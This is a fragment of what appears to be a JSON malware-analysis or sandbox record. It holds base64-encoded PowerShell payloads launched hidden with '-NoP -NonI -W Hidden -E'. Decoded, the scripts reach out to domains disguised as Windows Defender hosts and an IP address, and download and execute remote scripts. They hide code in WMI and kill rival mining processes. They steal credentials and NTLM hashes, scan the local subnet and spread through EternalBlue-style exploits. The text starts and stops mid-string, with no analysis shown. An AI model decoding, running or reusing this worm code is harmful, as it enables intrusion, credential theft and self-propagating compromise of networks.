BsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGM